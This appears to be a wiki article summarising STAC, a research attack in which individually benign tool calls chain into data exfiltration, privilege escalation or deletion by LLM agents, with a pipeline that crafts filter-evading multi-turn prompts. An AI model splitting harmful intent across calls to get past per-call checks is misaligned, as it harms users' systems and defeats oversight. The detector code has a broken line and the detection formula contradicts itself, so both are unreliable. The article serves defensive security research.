====== Sequential Tool Attack Chaining ======
STAC (Sequential Tool Attack Chaining) is a multi-turn attack framework targeting tool-enabled LLM agents, where sequences of individually benign tool calls combine to produce harmful operations that only become apparent at the final step. With 483 systematically generated attack cases and an average attack success rate exceeding 90%, STAC reveals a fundamental security blind spot in current agent architectures: per-call safety checks cannot detect threats that emerge from the cumulative effect of tool sequences.((([[https://arxiv.org/abs/2509.25624|STAC: Sequential Tool Attack Chaining Against LLM Agents. arXiv:2509.25624, 2025.]]))


<mermaid>
graph TD
    B1[Benign Call 1] --> B2[Benign Call 2]
    B2 --> B3[Benign Call 3]
    B3 --> COMBINE[Combined Effect]
    COMBINE --> HARM[Harmful Action]
    style B1 fill:#90EE90
    style B2 fill:#90EE90
    style B3 fill:#90EE90
    style HARM fill:#FF6B6B
</mermaid>

===== Background =====
As LLM agents gain access to real-world tools (file systems, APIs, databases, code execution), security research has focused primarily on prompt injection and single-turn jailbreaks. STAC identifies a fundamentally different threat class: **distributed malicious intent** across multiple tool calls, where each individual call passes safety filters but the sequence achieves harmful outcomes.

Unlike text-based jailbreaks, STAC attacks cause **real environmental changes**, file deletions, unauthorized access, data exfiltration, making impacts severe and difficult to reverse.

===== Threat Model =====
The attack operates under a realistic threat model:
  * The attacker controls the input prompt (user query) but not the agent's internal reasoning
  * Each tool call is individually inspected by safety filters
  * The agent has access to a standard tool suite (file operations, web requests, code execution)
  * No modification of the agent's system prompt or tool implementations

The key insight is that malicious intent is **factored across time steps**:

$$\text{Intent}(a_1, a_2, \ldots, a_n) \neq \sum_{i=1}^{n} \text{Intent}(a_i)$$

where each action $a_i$ has benign individual intent, but the composed sequence achieves a harmful goal. This is analogous to emergent behavior in complex systems, the whole exceeds the sum of its parts.

===== Attack Pipeline =====
STAC uses a closed-loop automated pipeline with three stages:

=== 1. Tool Chain Generation ===
Generate sequences of 2-6 tool calls where:
  * Steps $a_1, \ldots, a_{n-1}$ are benign setup operations (reading files, querying permissions, listing directories)
  * Step $a_n$ is the harmful finale that leverages the accumulated context
  * Each step individually passes safety classification

=== 2. Verification ===
Execute the generated chains in target environments:
  * Validate that each tool call succeeds with correct parameters
  * Confirm that the harmful outcome is achieved
  * Iteratively fix failures (invalid parameters, permission errors) to ensure executability

=== 3. Prompt Engineering ===
Reverse-engineer natural-sounding multi-turn prompts:
  * Create synthetic conversation contexts that motivate the agent to follow the tool chain
  * Ensure prompts avoid triggering content filters
  * Validate that agents reliably reproduce the attack sequence

===== Attack Categories =====
The 483 attack cases span diverse harmful outcomes:

  * **Data Exfiltration**, Reading sensitive files then transmitting via benign-looking API calls
  * **Privilege Escalation**, Querying permissions then exploiting discovered access paths
  * **Resource Manipulation**, Enumerating resources then selectively deleting or modifying
  * **Information Gathering**, Building comprehensive profiles from individually innocuous queries

===== Formal Analysis =====
The attack success rate (ASR) can be modeled as:

$$\text{ASR} = P\left(\bigcap_{i=1}^{n} \text{pass}(a_i)\right) \cdot P\left(\text{harmful}(a_1, \ldots, a_n) | \bigcap_{i=1}^{n} \text{pass}(a_i)\right)$$

Since each $P(\text{pass}(a_i)) \approx 1$ for benign-appearing calls, and the conditional probability of harm given passage is high by construction, the overall ASR remains above 90%.

The defense gap can be quantified. A per-call safety filter with false negative rate $\epsilon$ per call has cumulative detection probability:

$$P(\text{detect sequence}) = 1 - \prod_{i=1}^{n} (1 - \epsilon_i) \approx 0$$

when $\epsilon_i \approx 0$ for each benign-appearing call.

===== Code Example =====
<code python>
from dataclasses import dataclass

@dataclass
class ToolCall:
    name: str
    args: dict
    appears_benign: bool = True

def detect_stac_pattern(tool_history):
    # Detect potential STAC attacks by analyzing tool call sequences.
    # Returns risk score [0, 1] based on sequential pattern analysis.
    risk_score = 0.0
    info_names = {"read_file", "list_dir", "get_permissions"}
    action_names = {"write_file", "delete", "http_request"}

    info_calls = [t for t in tool_history if t.name in info_names]
    action_calls = [t for t in tool_history if t.name in action_names]

    if info_calls and action_calls:
        # Escalation pattern: info gathering followed by destructive action
        info_idx = max(tool_history.index(t) for t in info_calls)
        action_idx = min(tool_history.index(t) for t in action_calls)
        if info_idx < action_idx:
            risk_score += 0.4

    # Check for data flow between calls
    for i in range(1, len(tool_history)):
        prev_out = tool_history[i - 1].args.get("output_path", "")
        curr_in = tool_historyi.args.get("input_path", "")
        if prev_out and prev_out == curr_in:
            risk_score += 0.2

    return min(risk_score, 1.0)
</code>

===== Defense Recommendations =====
The authors identify the need for **sequence-level safety analysis**:
  * Monitor cumulative environmental state changes across tool calls
  * Implement trajectory-level intent classification rather than per-call filtering
  * Apply principle of least privilege dynamically based on conversation context
  * Use sandbox environments with rollback capabilities for sensitive operations

===== Results =====
  * **483 attack cases** generated and validated across diverse environments
  * **>90% attack success rate** against GPT-4.1 and other frontier models
  * Conventional prompt-based defenses provide **limited protection**
  * STAC represents a new threat class unique to tool-augmented agents

===== See Also =====
  * [[strix|Strix]]
  * [[agent_red_teaming|Agent Red Teaming]]
  * [[speculative_tool_execution|Speculative Tool Execution]]
  * [[agent_threat_modeling|Agent Threat Modeling]]

===== References =====
  * [[https://arxiv.org/abs/2509.25624|STAC: Sequential Tool Attack Chaining Against LLM Agents (2025)]]
  * [[https://arxiv.org/html/2509.25624v2|STAC Full Paper HTML]](([[https://arxiv.org/html/2509.25624v2|STAC Full Paper HTML — arXiv:2509.25624v2]]))
  * [[https://arxiv.org/pdf/2509.25624|STAC Full Paper PDF]](([[https://arxiv.org/pdf/2509.25624|STAC Full Paper PDF — arXiv:2509.25624]]))